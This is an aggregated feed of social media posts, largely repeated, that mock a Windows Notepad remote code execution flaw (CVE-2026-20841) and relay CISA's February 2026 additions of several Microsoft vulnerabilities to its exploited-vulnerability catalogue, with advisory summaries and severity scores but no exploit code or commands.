Windows Notepad App Remote Code Execution Vulnerability - https://www.cve.org/CVERecord?id=CVE-2026-20841
##Windows Notepad App Remote Code Execution Vulnerability
##Windows Notepad App Remote Code Execution Vulnerability
##Notepad was nice because all it did was display some text. Not necessarily very well, but it was better than whatever combination of decisions lead to βWindows Notepad App Remote Code Execution Vulnerabilityβ.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Microsoft: I have made Notepadβ¨
Security researchers: You fucked up a perfectly good plaintext editor is what you did. Look at it. It's got RCEs.
##They finally did it. Microsoft has successfully over-engineered a text editor into a threat vector.
This CVE is an 8.8 severity RCE in Notepad of all things lmao.
Apparently, the "innovation" of adding markdown support came with the ability of launching unverified protocols that load and execute remote files.
We have reached a point where the simple act of opening a .md file in a native utility can compromise your system. Is nothing safe anymore? π
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
#noai #microslop #microsoft #windows #programming #writing #windows11 #enshittification #cybersecurity #infosec #technology
##What is it, Microsoft shited their pants again lol β:neofox_laugh_tears:β
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
Even this page didn't load properly β:neofox_laugh_tears:β
#Microsoft #windows
@stefan@akko.lightnovel-dungeon.de @volpeon@icy.wyvern.rip Nope.
Here is the CVE
https://www.cve.org/CVERecord?id=CVE-2026-20841
microsoft: we have made a new notepad.exe
everyone else: you f***ed up a perfectly good text editor, is what you did. look at it. it's got RCE.
##CVE-2026-20841 = Windows Notepad App Remote Code Execution Vulnerability
"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files."
lolwut
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##someone earlier today said "RCE in Notepad" and i was like "haha funny" and then someone ELSE said RCE in Notepad and then i was like youve gotta be fucking kidding me
##Kein Kommentar. WΓ€re nicht zitierfΓ€hig. Aber...
RCE im Notizblock?! Wie verstrahlt- uhm "vibed" ist das denn?!
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##https://www.cve.org/CVERecord?id=CVE-2026-20841
##Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
Notepad
over a network
Microsoft Windows 11 enshitification continues with its screwing up what was a perfectly functional text file editor - Notepad - adding layers of garbage on it and congratulations, Notepad, yes, bleeding Notepad now has a code execution vulnerability on it.
https://www.cve.org/CVERecord?id=CVE-2026-20841
It's only the Windows 11 Notepad they've screwed up - anyone on any earlier version, which for safety's sake should only be online if it is Windows 10 with the Extended Service Updates (new one just today), is fine.
##RE: https://tech.lgbt/@solonovamax/116049115040950367
https://www.cve.org/CVERecord?id=CVE-2026-20841
WHAT'S THE NETWORK ELEMENT in FUCKING NOTEPAD
WHAT BIT COULD IT BEEEEEEEE
edit: ahhh! the notepad thing might not be copilot. the bug is that a URL in a markdown file can actually be a sploit that runs stuff as the user. so this may not be an ai story. dammit.
##"Windows Notepad App Remote Code Execution Vulnerability"
That's it: I'm going back to AppleWorks, on my Apple IIe.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##@m4rc3l CVE-2026-20841 #c3d2leaks
##From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##A vulnerability in Notepad π€¦ββοΈ
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Notepad.exe RCE Vulnerability 8.8
Are you shitting me?
Notepad... NOTEPAD!
CVE Record: CVE-2026-20841
##Really looking forward to the analysis of this remote code execution vulnerability in [checks notes] Windows Notepad
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Microsoft hat NOTEPAD.EXE jetzt erfolgreich kaputt gespielt.
##Notepad RCE? https://cvefeed.io/vuln/detail/CVE-2026-20841
##lmao, it's 2026 and we have spaceships in the heliosphere, high-resolution images of Pluto and a permanent robotic presence, in orbit and on ground, on Mars.
plus remote code execution in fucking Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Comments: https://news.ycombinator.com/item?id=46971516
lol
Windows Notepad App Remote Code Execution Vulnerability
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
#Windows #sΓ©curitΓ©
Oh misΓ¨re, y'a mΓͺme des failles RCE dans le Notepad de Windows ???
https://www.cve.org/CVERecord?id=CVE-2026-20841
Windows Notepad App Remote Code Execution Vulnerability
##Windows Notepad App Remote Code Execution Vulnerability
##Notepad was nice because all it did was display some text. Not necessarily very well, but it was better than whatever combination of decisions lead to βWindows Notepad App Remote Code Execution Vulnerabilityβ.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Microsoft: I have made Notepadβ¨
Security researchers: You fucked up a perfectly good plaintext editor is what you did. Look at it. It's got RCEs.
##They finally did it. Microsoft has successfully over-engineered a text editor into a threat vector.
This CVE is an 8.8 severity RCE in Notepad of all things lmao.
Apparently, the "innovation" of adding markdown support came with the ability of launching unverified protocols that load and execute remote files.
We have reached a point where the simple act of opening a .md file in a native utility can compromise your system. Is nothing safe anymore? π
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
#noai #microslop #microsoft #windows #programming #writing #windows11 #enshittification #cybersecurity #infosec #technology
##@stefan@akko.lightnovel-dungeon.de @volpeon@icy.wyvern.rip Nope.
Here is the CVE
https://www.cve.org/CVERecord?id=CVE-2026-20841
microsoft: we have made a new notepad.exe
everyone else: you f***ed up a perfectly good text editor, is what you did. look at it. it's got RCE.
##CVE-2026-20841 = Windows Notepad App Remote Code Execution Vulnerability
"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files."
lolwut
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##https://www.cve.org/CVERecord?id=CVE-2026-20841
##Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
Notepad
over a network
Microsoft Windows 11 enshitification continues with its screwing up what was a perfectly functional text file editor - Notepad - adding layers of garbage on it and congratulations, Notepad, yes, bleeding Notepad now has a code execution vulnerability on it.
https://www.cve.org/CVERecord?id=CVE-2026-20841
It's only the Windows 11 Notepad they've screwed up - anyone on any earlier version, which for safety's sake should only be online if it is Windows 10 with the Extended Service Updates (new one just today), is fine.
##RE: https://tech.lgbt/@solonovamax/116049115040950367
https://www.cve.org/CVERecord?id=CVE-2026-20841
WHAT'S THE NETWORK ELEMENT in FUCKING NOTEPAD
WHAT BIT COULD IT BEEEEEEEE
edit: ahhh! the notepad thing might not be copilot. the bug is that a URL in a markdown file can actually be a sploit that runs stuff as the user. so this may not be an ai story. dammit.
##"Windows Notepad App Remote Code Execution Vulnerability"
That's it: I'm going back to AppleWorks, on my Apple IIe.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##@m4rc3l CVE-2026-20841 #c3d2leaks
##From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##A vulnerability in Notepad π€¦ββοΈ
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
updated 2026-02-10T21:51:48.077000
10 posts
Critical Windows RasMan Zero-Day Exploited: February 2026 Patch Released
Microsoft has urgently released security updates on February 10, 2026, to fix a critical zero-day vulnerability in the Windows Remote Access Connection Manager (RasMan) service. This flaw, tracked as CVE-2026-21525, is actively exploited in the wild, enabling attackers to crash systems and disrupt remote connectionsβa serious concern for organizations relying on VPNs, remote desktops, and otherβ¦
https://undercodenews.com/critical-windows-rasman-zero-day-exploited-february-2026-patch-released/
##π CVE-2026-21525
CVE-2026-21525
Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.
π CVSS Score: 6.2
β οΈ Severity: Medium
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21525
π‘οΈ CWE: CWE-476
π CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21525
π¨ [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
β οΈ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
β οΈ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
β οΈ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
β οΈ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
β οΈ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
β οΈ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21525
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##π CVE-2026-21525
CVE-2026-21525
Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.
π CVSS Score: 6.2
β οΈ Severity: Medium
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21525
π‘οΈ CWE: CWE-476
π CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21525
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21525
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:51:48.077000
1 posts
Critical FortiOS Vulnerability Exposes Networks to LDAP Authentication Bypass
Fortinet has issued a major security alert warning of a serious flaw in its FortiOS firewall software. The vulnerability, tracked as CVE-2026-22153, allows attackers to bypass LDAP authentication entirelyβmeaning hackers can gain access without needing a valid username or password. This type of breach could compromise sensitive enterprise networks and VPN connections, putting critical data atβ¦
##updated 2026-02-10T21:51:48.077000
13 posts
age-verification concerns.
- Windows security flaws: multiple 2026 CVEs (Notepad RCE CVE-2026-20841; MSHTML; CVE-2026-21510/13/19/25/33) and ongoing Patch Tuesday updates.
- AI and work: productivity boosts but rising cognitive load and burnout; AI adoption altering job markets and roles.
- Open/indie web and OSS: growing use of Pixelfed, Matrix, Zulip; open-source Discord alternatives (Stoat chat); broader Fediverse/indie-web movement.
- Space/AI funding and policy: [2/3]
π CVE-2026-21510 - High (8.8)
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21510/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21510
CVE-2026-21510
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
π CVSS Score: 8.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21510
π‘οΈ CWE: CWE-693
π CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21510
π¨ [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
β οΈ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
β οΈ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
β οΈ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
β οΈ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
β οΈ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
β οΈ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21510
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##π CVE-2026-21510 - High (8.8)
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21510/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21510
CVE-2026-21510
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
π CVSS Score: 8.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21510
π‘οΈ CWE: CWE-693
π CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21510
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21510
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
